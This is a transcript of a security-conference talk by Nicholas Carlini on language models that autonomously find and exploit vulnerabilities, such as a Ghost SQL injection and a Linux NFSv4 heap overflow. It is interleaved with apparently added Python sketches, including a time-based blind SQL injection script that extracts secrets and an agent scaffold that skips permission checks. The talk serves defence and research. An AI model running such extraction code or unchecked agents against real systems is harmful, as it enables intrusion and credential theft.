
Nicholas Carlini - Black-hat LLMs | [un]prompted 2026


Large language models (LLMs) are rapidly evolving and are now capable of autonomously finding and exploiting zero-day vulnerabilities in critical software, a capability that has emerged only in the last few months. This rapid advancement signifies a major shift in cybersecurity, comparable to the advent of the internet, potentially ending the long-standing balance between attackers and defenders.

Full Transcript

https://www.youtube.com/watch?v=1sd26pWhfmg

[00:06] All right.
[00:09] So, before Nicholas speaks, I want to say a couple of words as well.
[00:14] I think that there are people in this industry who have been doing this for a long, long time, who truly understand this and can be considered the best.
[00:22] Now, who is the best one, the best two, the best three?
[00:25] I don't really know.
[00:27] But, we have the opportunity right now to listen to somebody who has not just been the best at this for the past year or the past two years, but for a long while and consistently makes the industry better just by doing his research, regardless of how much of that comes out.
[00:40] And I'll also tell you that he agreed at the last second and went through all the corporate uh PR nonsense, which I don't know how much of you have to do at Anthropic.
[00:47] It seems like you guys are easier than other people to deal with, to manage to come here and give this talk to you today.
[00:52] So, I just want to thank him, for everybody, for the last-second, last-minute jump into this, coming on stage and rushing in, handling what is truly a global-level emergency of a situation, just to come and speak to us all.
[01:05] So, please, let's give it up for Nicholas.
[01:14] Okay, thanks. Um yeah, so I'm Nicholas.
[01:17] Um I'm at Anthropic, and I'm going to spend a little bit of time um just talking about some of the things that I'm interested in in language model security.
[01:25] Um and I guess the thing that I've been caring about most recently has been, I guess, I don't know, call it black-hat language models: just trying to understand how we can use language models in order to make them cause harm.
[01:41] Not because I want this to happen, right? That would be bad.
[01:43] Um but I want to understand what bad things people who wanted to cause harm would do, so that then we can make that not possible.
[01:51] Okay.
[01:52] Um the basic lesson that I hope you take away from this talk is um relatively simple.
[01:57] Um today, it is true that language models can autonomously, and without fancy scaffolding, find and exploit zero-day vulnerabilities in very important pieces of software.
[02:13] Uh this is not something that was true even, let's say, three or four months ago, um but it is now becoming true, and I think it'll become only more true over the next couple of years.
[02:25] And so, I don't know if this is the main lesson, but the real thing I want you to take away is that they're getting really, really good, really fast, and this means that the nice balance we had between attackers and defenders over the last 20 years or so seems like it's probably coming to an end. It really seems to me like the language models that we have now are probably the most significant thing to happen in security um since we got the internet.
[02:53] Um you know, before we had the internet there was not that much that you could do to attack someone else. Like, you'd have to send them a floppy disk or something. Now you have the internet, and you can do remote attacks.
[03:03] Language models really feel to me to be something that's roughly on this order of importance, which is not something that I believed, I don't know, three or four years ago.
[03:12] But, the models have gotten really, really good and I want to just give you a couple examples of what this is looking like.
[03:17] Okay.
[03:22] So, um let me show you how we've been finding some bugs in some really important software.
[03:27] Um and I'll show you what we found in just a second, but let me just like show you the scaffold that we've been using.
[03:33] Um uh here it is.
[03:35] Um this is basically the entirety of it.
[03:36] You know, we have a couple more sentences here and there, um but basically we run Claude Code, and we run it in a VM with permission checks dangerously skipped, and just let it do whatever it wants.
[03:45] And then we say, "Hey, um you're playing in a CTF.
[03:48] Um please find a vulnerability and put the most serious one in this output file.
[03:52] Um go."
[03:54] And then we sort of walk away, and we come back and we read the vulnerability report, and usually it's pretty good and has found some pretty severe things.
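To make the scaffold concrete, here is a minimal sketch of that kind of driver, assuming the claude CLI is installed inside a throwaway VM; the prompt wording, the findings.md output file, and the flags shown (-p for a one-shot prompt, --dangerously-skip-permissions) are illustrative stand-ins rather than the exact scaffold from the talk.

    # Minimal sketch of the scaffold described above (illustrative only).
    # Assumes the `claude` CLI is available inside a disposable VM; check
    # `claude --help` for the exact flag names in your installed version.
    import subprocess

    PROMPT = (
        "You are playing in a CTF. Audit the code in this repository, "
        "find vulnerabilities, and write the single most serious one, "
        "with a proof-of-concept, to findings.md. Go."
    )

    def run_audit(repo_dir: str) -> str:
        # Let the agent do whatever it wants inside the VM, then read back
        # whatever it wrote to the output file.
        subprocess.run(
            ["claude", "-p", PROMPT, "--dangerously-skip-permissions"],
            cwd=repo_dir,
            check=True,
        )
        with open(f"{repo_dir}/findings.md") as f:
            return f.read()

    if __name__ == "__main__":
        print(run_audit("/path/to/target-repo"))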
[04:01] And this basically works.
[04:03] Like, you can definitely do much better if you have fancier scaffolding.
[04:07] You can definitely do it cheaper if you have fancier scaffolding.
[04:13] Um but, you can do it just by asking the model to find these bugs.
[04:16] And the reason why that matters to me is because what I care about is, what is the base capability of the model?
[04:20] Because if someone who's malicious wants to go cause some harm, they don't have to spend six months designing some fancy fuzzing harness or something; they can just go do bad things with it. Like, this is quite, quite scary.
[04:33] Um okay.
[04:37] Um small little problem though with this.
[04:38] It's like a little deficient in two ways.
[04:40] One way is that um I can't do this at large scale.
[04:42] Like, if I take a piece of software and I ask Claude to find a bunch of vulnerabilities and run it multiple times, it will probably find the same bug each time.
[04:53] Um I don't know, it just turns out to be the case that this is what happens.
[04:55] Um also like it's just not very thorough.
[04:57] Um it will review some of the code, but not all of the code.
[05:02] And so, we have a very simple trick for this, um which is I'm just going to add one more line um and I'm going to say like, "Hint, please look at this file foo.c."
[05:08] Uh and then what I could do is say, "Okay, now look at bar.c. Now look at some other file."
[05:14] And I could just do this for all of the files in the project.
[05:16] And then it will at least look at all of them, and this works quite well.
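The per-file hint trick is just a loop around the same kind of invocation. A sketch, assuming C sources and one hypothetical findings file per run (again, the prompt and flags are illustrative):

    # One independent run per source file, so coverage is thorough and the
    # runs don't all converge on the same bug. Paths and filenames illustrative.
    import pathlib
    import subprocess

    BASE_PROMPT = (
        "You are playing in a CTF. Find a vulnerability and write the most "
        "serious one, with a proof-of-concept, to findings-{name}.md. "
        "Hint: please look closely at the file {path}."
    )

    def audit_every_file(repo_dir: str) -> None:
        repo = pathlib.Path(repo_dir)
        for path in sorted(repo.rglob("*.c")):   # foo.c, bar.c, ...
            prompt = BASE_PROMPT.format(name=path.stem, path=path.relative_to(repo))
            subprocess.run(
                ["claude", "-p", prompt, "--dangerously-skip-permissions"],
                cwd=repo_dir,
                check=False,   # keep going even if one run fails
            )

    audit_every_file("/path/to/target-repo")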
[05:22] Okay.
[05:24] Um
[05:26] We wrote a blog post where we talked about some of the things that we found.
[05:31] Uh the blog post exists, so I'm not going to tell you about the bugs that we had in there.
[05:36] Um we talked about a bunch of them, um but it's been now roughly a couple weeks since this blog post came out.
[05:41] So, I'd like to tell you about a couple of new ones that have been fixed, that we can now talk about because, um you know, they've been patched.
[05:49] Um so, I'm going to tell you in particular about two that I think are interesting.
[05:52] One is interesting because of how Claude could build an autonomous exploit, and one because the vulnerability that it found is quite interesting.
[06:00] So, first one, web apps.
[06:03] Um okay, so I I used to be a security person.
[06:06] Um Web apps is like the thing that every security person always finds bugs in.
[06:09] They're really bad.
[06:12] Um Here's this content management system called Ghost.
[06:14] Um I hadn't seen it before, but like 50,000 stars on GitHub.
[06:17] It's like, I don't know, apparently quite popular.
[06:20] Um it has never had a critical security vulnerability in the history of the project.
[06:21] We found the first one.
[06:23] Um what's the vulnerability?
[06:26] The vulnerability um is SQL injection.
[06:29] It turns out that they were concatenating some strings and some user input went into some SQL query.
[06:35] Everyone knows that this is like a problem.
[06:38] It's not really a surprise to anyone, and yet, I don't know, these things have been around for 20 years and they're going to be around for another 20, right?
[06:45] Like, it's not that surprising that the model can find these bugs.
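As a schematic illustration of the bug class (not Ghost's actual code), the difference between concatenating user input into SQL and binding it as a parameter looks roughly like this:

    # Schematic illustration of SQL injection via string concatenation,
    # using an in-memory SQLite database. Not Ghost's actual code.
    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, email TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin@example.local')")
    conn.execute("INSERT INTO users VALUES (2, 'someone@else.local')")

    user_input = "1 OR 1=1"   # attacker-controlled string

    # Vulnerable: the input becomes part of the SQL text itself.
    rows = conn.execute("SELECT email FROM users WHERE id = " + user_input).fetchall()
    print(rows)               # every row comes back, not just id=1

    # Safe: the input is bound as a value and never parsed as SQL.
    rows = conn.execute("SELECT email FROM users WHERE id = ?", (1,)).fetchall()
    print(rows)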
[06:48] But, what's interesting to me is that this particular vulnerability you can only exploit with a blind SQL injection, meaning I don't actually see the output.
[06:55] I can only observe how long it takes, or whether it crashes or not.
[06:59] And uh I wasn't sure if this was exploitable, and I wanted to, you know, send a good report to the maintainers.
[07:06] And so, I was like, "Okay, is this some low-severity thing where maybe I can leak a couple bits here and there, or is this really important?" I asked the model, you know, "Give me the worst that you can."
[07:15] Um and so, it wrote me this.
[07:17] Um so, okay, here let me play a demo.
[07:20] I'm going to launch um on this one window here a Docker container that just is running Ghost.
[07:24] Um I have my own instance of it running now.
[07:26] Um I've logged in as admin at example.local, yeah, with some admin account here.
[07:31] And then I run the exploit on uh this thing.
[07:34] Um and I wrote none of this code; um via blind SQL injection, it just reads off the complete credentials from the production database.
[07:45] Um no authentication.
[07:47] Um it reads the admin API key and secret, which lets me mint arbitrary new things that I want.
[07:52] I can do now anything that I want to the production app and it reads off the hash of the password.
[07:58] Um okay, fortunately it's bcrypt um you know, so that's good.
[08:01] But, again, it gives you literally everything that you could want from unauthenticated access.
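For reference, a time-based blind SQL injection extraction loop generically looks something like the sketch below. The endpoint, parameter name, table, and MySQL-style SLEEP payload are hypothetical placeholders; this is not the exploit the model wrote for Ghost, just the shape of the technique: each request leaks one character by whether the response is slow.

    # Generic time-based blind SQL injection sketch (hypothetical endpoint,
    # parameter, and schema; assumes a MySQL-style SLEEP() on the back end).
    import requests

    TARGET = "http://localhost:2368/vulnerable-endpoint"   # hypothetical
    DELAY = 2.0                                            # seconds injected on "true"

    def char_matches(position: int, candidate: str) -> bool:
        # If the guess is right, the injected SLEEP fires and the response
        # takes noticeably longer than a normal request.
        payload = (
            f"x' OR IF(SUBSTRING((SELECT secret FROM api_keys LIMIT 1),"
            f"{position},1)='{candidate}', SLEEP({DELAY}), 0) -- "
        )
        r = requests.get(TARGET, params={"filter": payload}, timeout=DELAY + 5)
        return r.elapsed.total_seconds() > DELAY

    def extract_secret(length: int = 32) -> str:
        secret = ""
        for pos in range(1, length + 1):
            for c in "0123456789abcdef":
                if char_matches(pos, c):
                    secret += c
                    break
        return secret

    print(extract_secret())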
[08:04] Um and like I probably could have built this attack.
[08:08] Like, this attack is not super hard, but there's some amount of nuance you need in order to get this to go right.
[08:16] And like I didn't need any security experience in order to have this happen.
[08:21] So, these models like are really quite good at actually implementing um these exploits now.
[08:25] And this sort of fundamentally changes the way that these things go.
[08:29] Um so, this is one example of an attack that was possible because the model was particularly good at doing the exploitation piece.
[08:35] Um let me now spend a couple of minutes on another side where it's particularly good because of the bugs it can find.
[08:44] Um so, Linux kernel.
[08:47] Um one of like the most important pieces of software that we all use every day.
[08:51] Um very, very, very hardened.
[08:52] Um We now have a number of remotely exploitable um heap buffer overflows in the Linux kernel.
[08:58] Um I have never found one of these in my life before.
[09:00] Uh this is like, I don't know, very, very, very hard to do.
[09:05] Um with these language models, I have a bunch.
[09:07] Like, this is, I don't know, quite quite scary to me.
[09:11] Um let me walk you through one of them, which is in the NFS v4 daemon in the kernel.
[09:20] And um pay attention to sort of how this attack works and then remember in the back of your mind that a language model found this.
[09:23] Okay, so um you have a client connecting to the NFS server and it sort of does the three-way thing like, "Hello, I would like to talk to you."
[09:31] The server says, "Okay."
[09:32] And then it responds.
[09:33] Uh and the client, it's you know, talking to NFS, so it says, "I'd like to open up this lock file."
[09:39] And the server says, "Great."
[09:40] And the client acknowledges that.
[09:42] Um and then it takes out a lock and puts, as its name, um a 1024-byte sort of value identifying who the person is who owns the lock.
[09:50] Uh the server says it's granted, and so we're good here.
[09:53] Um then what the attacker does is it creates a second client, client B, that talks to the server.
[09:58] Um which again says hello, um I'd like to talk to you.
[10:01] The server says great, um I have acknowledged you as client B.
[10:06] Client B says, I'd also like to take an open on this other lock, and the server says great, you can do that.
[10:10] Um and then it takes the lock here.
[10:17] And at this point client A already owns this lock, so you can't grant the lock also to client B.
[10:22] And so the server says like okay, like deny the lock, this is not something that's allowed.
[10:27] Except what happens is that the response it's now going to send to client B is going to be um 1,056 bytes long.
[10:37] Um it's going to have some offset and some length, and then it has this owner, um and the owner is the bytes that came from the first attacker.
[10:44] And so those bytes are now copied here, and it turns out that it's going to write this into a buffer of size 112, which gives you now a heap buffer overflow in the kernel.
[10:53] Okay, not that great.
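A schematic of the size mismatch being described, with Python standing in for the kernel's C (the 112-byte buffer, 1024-byte owner, and 1,056-byte reply are the figures from the talk; the 32-byte header split and variable names are illustrative):

    # Schematic model of the overflow: client A registers a lock with a
    # 1024-byte owner value; when client B's conflicting lock is denied, the
    # server copies that owner into a reply buffer sized for a much smaller one.
    REPLY_BUFFER_SIZE = 112             # fixed-size buffer used to build the denial
    HEADER_BYTES = 32                   # offset/length fields etc. (illustrative split)
    owner_from_client_a = b"A" * 1024   # attacker-chosen lock-owner value

    reply_len = HEADER_BYTES + len(owner_from_client_a)
    print("denial reply:", reply_len, "bytes")      # 1,056 bytes, as described

    overflow = reply_len - REPLY_BUFFER_SIZE
    # In the kernel, copying past the 112-byte buffer corrupts adjacent heap
    # memory; here we just report how far the write would run past the end.
    print("bytes written past the buffer:", overflow)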
[10:58] A language model found this.
[11:00] Like this is not a trivial bug.
[11:03] Like you have to understand that there are, like, two competing or two cooperating adversaries, you know, where one of them has a long thing here, and you send, you know, a bunch of packets over there.
[11:16] Like you would never find this by fuzzing. Um and by the way, this entire slide was copied and pasted from the report that the language model wrote.
[11:20] Like it produced this very nice flow schematic; I literally just copied and pasted this.
[11:26] The model produced this schematic explaining to me how the attack works.
[11:29] Um and so it's really quite good at doing these kinds of things, um far better than I think people give them credit for.
[11:35] Um and so when you're finding these bugs with these things, it's like we used to live in a world where we assumed that we had to hold their hand in order to help them, kind of like, you know, a fuzzer.
[11:41] You know, like it can sort of do little things here and there, but no. This is a bug.
[11:44] Um like here's the commit that introduced the bug.
[11:46] Um sorry, it's not a commit, it's a change set.
[11:49] Why is it a change set that introduced this bug? Because this bug predates Git.
[11:52] Like this bug has been in the kernel since 2003, and it's older than some of you in this room.
[11:58] Right? Like this is a really old bug that has been found by the language models.
[12:20] Right?
[12:20] Like it's a very non-trivial kind of thing that the language models have been able to do here.
[12:24] Right?
[12:26] Like, speechless does not even begin to describe it. These models really can do some very impressive things, and, you know, we really need to start rethinking things. Um if you spend a little bit of time thinking forwards: we've only just seen the models that can do this in the last couple of months.
[12:48] Like the first models that that can find these kinds of vulnerabilities were really only introduced a couple of months ago.
[12:54] We sort of tried to see how often um we could reproduce these kinds of bugs with older models. I don't know, okay, so Sonnet 4.5 was released like only 6 months ago, and Opus 4.1 is less than a year old.
[13:07] Those ones can't find these bugs almost ever.
[13:10] The new models released over the last 3 months, 4 months can.
[13:13] So it's just on the edge of being able to find these kinds of bugs, and this is not the last model that's going to exist.
[13:20] Like there are going to be more, and they're going to keep on getting better.
[13:23] Um and like in a very very real sense, we are like on this exponential.
[13:26] Um you've probably seen this plot more times than you wanted to see it.
[13:30] It's this plot from METR that shows, as a function of model release date, um how long of a task they can do, measured in how long it takes humans.
[13:39] So the most recent models can do tasks that take humans roughly 15 hours, and they can succeed at that roughly half of the time.
[13:48] Um this is a nice plot by METR.
[13:50] Um we tried to produce a similar version of this plot.
[13:52] Oh yeah, by the way, um doubling time every 4 months.
[13:54] So I don't know, be a little worried there if this trend continues.
[13:57] Maybe it doesn't, but, you know, if it continues for like another year, um we're going to, you know, have these models producing, you know, large amounts of code, um, better than most of us.
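For a rough sense of what that compounding means, here is the arithmetic with the numbers quoted above (a roughly 15-hour task horizon today, doubling every 4 months); this is a naive extrapolation of the quoted trend, not a forecast.

    # Back-of-the-envelope extrapolation of the quoted trend: ~15-hour task
    # horizon today, doubling every 4 months. Pure arithmetic, not a prediction.
    HORIZON_HOURS = 15        # tasks current models complete ~50% of the time
    DOUBLING_MONTHS = 4

    for months_ahead in (4, 8, 12, 24):
        horizon = HORIZON_HOURS * 2 ** (months_ahead / DOUBLING_MONTHS)
        print(f"+{months_ahead:2d} months: ~{horizon:,.0f}-hour task horizon")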
[14:09] Um so we tried to produce a similar kind of plot where, um instead of looking at how long of a task models can do, we tried to look at, okay, smart contracts.
[14:22] Okay, why smart contracts?
[14:23] Because they have dollar values associated with them.
[14:26] And so you can ask how much money can I steal from a smart contract by having a language model find and exploit a vulnerability?
[14:32] And so okay, this is from a paper um by two of our MATS scholars, Winnie and Cole.
[14:40] And what they showed was that recent language models um can identify and exploit vulnerabilities and recover like several million dollars from actual real smart contracts.
[14:53] Um and that the rate of their ability to do this is again growing exponentially.
[14:56] Note the log scale on the Y axis here again.
[14:59] And so like these models are getting really really good at doing these kinds of things.
[15:03] And again, I have no reason to believe that they're going to stop getting better at this continuing rate.
[15:08] Okay, I'm like sort of coming back to the slides.
[15:11] I think like this really is the thing I want you to take away.
[15:12] It's not where we are at this moment in time.
[15:15] Yes, at this moment in time, the models can find vulnerabilities in the Linux kernel.
[15:17] Yes, at this moment in time they can find, you know, these critical CVEs um in really important software that people use.
[15:25] But the rate of progress is very large, and so you should expect that while the best models can do this today, the average model you have on your laptop can probably do this in a year.
[15:37] Um.
[15:40] I'm a skeptical person. I didn't believe in language models for a very long time.
[15:47] Uh when I first saw language models, the only thing that I did with them was sort of prod them and make fun of how easily they broke.
[15:53] Um but they actually are quite good right now. They of course have problems, but you can't just stick your head in the sand. Like these things are working really, really well.
[16:07] Um and you know, there are some people who say, you know, it's on an exponential.
[16:11] I agree the exponential is not going to last forever. Um I remember when CPUs were getting exponentially faster every couple of years.
[16:18] Right? Like this is the fastest CPU that Intel produced every year, starting from the 4004 um up until the first Pentiums um in 2000.
[16:24] Very nice clean exponential.
[16:28] And then of course, you know, the exponential tapers off,
[16:30] it's no longer exponential, what do you know?
[16:32] Um there is going to be a bend.
[16:34] No one denies this.
[16:35] No exponential can continue forever.
[16:37] Um but it's very hard to predict when the bend is going to happen.
[16:41] Like maybe the bend happens in 6 months.
[16:43] Maybe in 6 months it's the case that the models are no longer getting exponentially better.
[16:46] Maybe it happens in 2 years.
[16:48] And when the bend happens will matter quite a lot for what capabilities these models have,
[16:49] and I think you should not assume that like it's definitely going to happen in a couple of months because people have been saying this forever.
[16:50] For like the last 10 years people have been saying deep learning is going to hit a wall, and at least as of yet it has not.
[16:53] And so like we should be willing to entertain the possibility that it might, especially as security people.
[16:55] Right?
[16:57] Like, so I went to the Crypto conference, where I gave a talk.
[17:24] And I observed that like 10 of the papers at this conference were on post-quantum cryptography.
[17:27] I don't know if you know this, but we don't have quantum computers, and yet cryptographers are working on post-quantum cryptography, because they understand that it is worth investing in defending against something that we don't have in front of us right now.
[17:40] And yet here is a thing that I have literally right in front of me right now finding these kinds of bugs, and I often talk to security people, and they're in denial about it.
[17:49] So we really, really need to understand that this is the exponential we're on.
[17:54] Um this is a fun slide that I like to show.
[17:59] Um this is from uh the International Energy Agency, which every year um makes a prediction for how much of various kinds of energy people are going to be using for generation.
[18:09] Um and here's the plot for how much solar is actually being deployed versus their predictions.
[18:16] Uh the red lines are their predictions from every point in time, white is what's actually true.
[18:20] Um for more than half of the years, their prediction for what would happen in 2040 happened the next year.
[18:30] You would think that they would have learned, like the 15th time this happened, that you should continue the exponential trend, but every year they assume that things will continue at roughly the current rate, and every year it goes up by, I don't know, another 30 or 40%.
[18:46] We should not be them.
[18:48] Like we should sort of understand that these things have been getting exponentially better every couple of months for the last couple of years.
[18:56] And it may be the case that things flatten out, but probably not, at least probably not for like the next couple of months.
[19:02] So, I think, you know, these next couple of months will really be some of the most important months for security.
[19:08] Okay, um I have 2 minutes left for a conclusion.
[19:14] Um It's pretty clear to me that these current models are better vulnerability researchers than I am.
[19:18] Um I used to do this uh somewhat professionally.
[19:21] Um I have CVEs to my name. Um I did not have... okay, now I do, but I did not have CVEs in the Linux kernel.
[19:29] Like these models are better vulnerability researchers than I am.
[19:32] It's probably not yet better than all of you, but at some point it will be.
[19:36] Like if we continue on this trend for even just another year, they'll probably be better vulnerability researchers than all of you.
[19:41] And I don't know what that world looks like.
[19:43] Like it's quite scary to live in a world where you can automatically find bugs that previously only, like, the top one or two people in the world could have found.
[19:49] Um
[19:51] So maybe my call to action is help us make the future go well.
[19:53] We're going to need all the help that we can get.
[19:55] Um for our part at Anthropic, um there's this Claude Code security effort that is trying to do something to find bugs.
[20:00] Um you heard earlier today from DeepMind; um OpenAI has their Aardvark project.
[20:05] Speaking not as an Anthropic employee like I don't really care where you help.
[20:07] Just please help.
[20:10] Like, you know, it would be great if you would like to, you know, help us at Anthropic too, but the world will need a lot of people to be doing a lot of this work, and it needs to happen soon. Like, order months. I think waiting a year is going to be too long.
[20:40] Um we are going to have a huge number of bugs. I have so many bugs in the Linux kernel that I can't report because I haven't validated them yet. I'm not going to make some open source developer validate bugs that I haven't checked yet. Like, I'm not going to send them, you know, potential slop, but this means that I now have, I don't know, several hundred crashes that they haven't seen because I haven't had time to check them.
[21:01] Um we need to find a way to fix this so that we can actually go through all this stuff, because soon it's not just going to be me who has all of this; it's going to be anyone malicious in the world who wants it.
[21:10] So really, um yeah. I'd encourage you to find a way to see if, um, you know, some particular set of skills that you have could help us make sure things go well over the next couple of months and over the next couple of years, because I am quite worried about how this direction is heading. Um and yeah, we need all the help we can get. Um thank you.
[21:40] Um while I wait for questions, I'll just leave this video playing in the background.
[21:45] What should we be watching for?
[21:47] Uh, just watch. It's fine. Um, let's take a question.
[21:51] That's hardly fair.
[21:53] Uh, yeah, I'm sure there are questions. Let's take some. I'll take one from over here first.
[22:00] Hello. Hello.
[22:01] Hey. Uh hi. I'm Nabin from Palo Alto Networks.
[22:06] So I'm wondering, given the future where bugs will be found autonomously, like the ones we can't find, as you mentioned: since you guys have the visibility, should we think about something to identify the malicious intent? Because it would be impossible for us to fix all the zero-day bugs in all the repos around the world. What's your thought, because you guys have the control? What can we do in that regard? Thank you.
[22:37] Yeah. Um so identifying malicious intent is hard, because security is dual use.
[22:42] Um I want to allow people to use the models to find bugs to fix things, if they're the developer of the software; I would ideally not like to let someone use the models to go and exploit things.
[22:56] And for a very long time in security, we've always understood that the dual-use nature favored the defender. You know, pick any software that exists: it generally favors the defender more than the attacker. I think this has been true, and this has been the way that we've been operating in the past. Um it's unclear if this will always be true in the future, especially for language models, as we go forwards.
[23:21] Um and so I do want to make sure that people can't use these things for harm. And indeed, you know, Anthropic's models and OpenAI's models and DeepMind's models um will generally refuse if you're very explicitly doing nasty things. Um clearly they need to get better if they're going to be able to refuse everything, but, um, you know, I don't want to not let people be honest defenders.
[23:49] Okay, so the way I think about this is: if I put a safeguard in place that's very, very weak, it will only stop the good people from using the software. The bad people are just going to jailbreak the model, and they're going to still attack it anyway. But the good people won't; they're not going to circumvent the safeguards. And so I want to make sure the good people have access to the software, but if I put too-strong safeguards in place, then they don't have access to the software. And so it's very nuanced how you want to do this. Everyone is trying their best to find the right balance, and I think we're doing an okay job, but, um, you know, I think this is one of the areas where we need a lot more help to figure out how to do this better.
[24:26] Hi.
[24:27] I'm Michael Siegel from MIT. Just wanted to ask, um, a comment on both the speed, that is, as this becomes faster, uh, the bad guys will have things faster, and they'll also be concerned that they will be fixed faster, so for a period of time we're going to be dealing a lot with changes in speed; and then, what's sort of the end game? There's been a long-term argument about whether vulnerabilities are dense or sparse, and ultimately, if we get this good at things, do we really get down to almost no vulnerabilities? Two questions.
[25:03] Um okay. Great question.
[25:07] Um I tend to think, and many people tend to think, that in the long term probably the defenders win.
[25:12] Like, you know, in the limit, I'll just rewrite all the software in Rust and get rid of memory corruption vulnerabilities, and in the limit I'll, you know, formally verify all of my protocols. You know, TLS is proved now to be safe under, you know, various assumptions. I'll prove everything, and in the limit this is good.
[25:30] Um but in the transitionary period between now and then, things probably are very bad. And this is, I think, why I particularly want people to help, like, immediately: because the transitionary period is where I'm most worried, and we are in the transitionary period now. And so I think, yeah, we need quite a lot of help making sure that even if things will go well in the future, um, things will be, uh, at least not bad now.
[25:56] Um you know, I think the other analogy people like to give is, you know, the industrial revolution: um, all else equal, it was a good thing, but for the people who were living through it, it was kind of hard.
[26:07] Um we sort of want to make things go well, um, you know, for the people who are living through the thing, um, but still get us to the nice end state. Um and just, yeah, making that happen is going to be, yeah, challenging.
[26:22] Yeah. Thank you.
